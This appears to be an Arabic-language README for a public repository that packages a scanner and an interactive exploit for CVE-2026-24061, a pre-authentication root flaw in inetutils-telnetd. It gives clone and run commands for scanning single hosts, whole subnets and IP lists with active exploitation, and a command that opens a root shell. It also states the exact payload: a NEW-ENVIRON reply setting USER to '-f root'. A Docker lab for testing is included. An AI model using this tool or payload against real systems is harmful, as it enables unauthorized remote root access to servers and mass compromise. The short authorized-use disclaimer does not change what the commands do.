
# ماسح واستغلال تفاعلي لثغرة CVE-2026-24061 في inetutils-telnetd، يتيح الوصول إلى صلاحيات الجذر قبل المصادقة عبر تفاوض NEW-ENVIRON مُصمَّم خصيصًا. يتضمن مسحًا متعدد الخيوط ومختبر Docker.
👨💻 المؤلف: فوركان كايابينار (@FurkanKAYAPINAR)
يحتوي هذا المستودع على ماسح للثغرات واستغلال تفاعلي لثغرة CVE-2026-24061. تؤثر هذه الثغرة على inetutils-telnetd (وربما تطبيقات Telnet أخرى) من خلال المعالجة غير السليمة لخيار Telnet NEW-ENVIRON، مما يسمح بالوصول عن بُعد قبل المصادقة باستخدام حمولة -f root.
--exploit للتحقق من تنفيذ الأوامر عن بُعد (RCE).inetutils-telnetd للاختبار الآمن.تأكد من تثبيت Python 3.x.
git clone https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root.git
cd CVE-2026-24061-telnet2root
## الاستخدام
افحص الأهداف بحثًا عن ثغرة NEW-ENVIRON.
# فحص هدف واحد
python3 scanner.py -t 192.168.1.100 -p 1903
# فحص شبكة فرعية
python3 scanner.py -s 192.168.1.0/24 -p 1903
# فحص قائمة عناوين IP ومحاولة الاستغلال النشط (فحص RCE)
python3 scanner.py -l ips.txt -p 1903 --exploit
احصل على وصول تفاعلي بصلاحيات الجذر.
python3 exploit.py -t 127.0.0.1 -p 1903
انشر بيئة محلية ضعيفة للاختبار:
cd lab
docker-compose up -d --build
يتم تشغيل الثغرة أثناء مرحلة التفاوض في Telnet. من خلال الرد على طلب الخادم DO NEW-ENVIRON بحزمة تفاوض فرعية مصممة خصيصًا بصيغة IS VAR "USER" VALUE "-f root"، يتم خداع عملية telnetd على الخادم لتمرير علامة -f root إلى عملية login، متجاوزًا بذلك المصادقة.
[!WARNING]
هذه الأداة مخصصة لأغراض تعليمية واختبارات أمنية مصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي.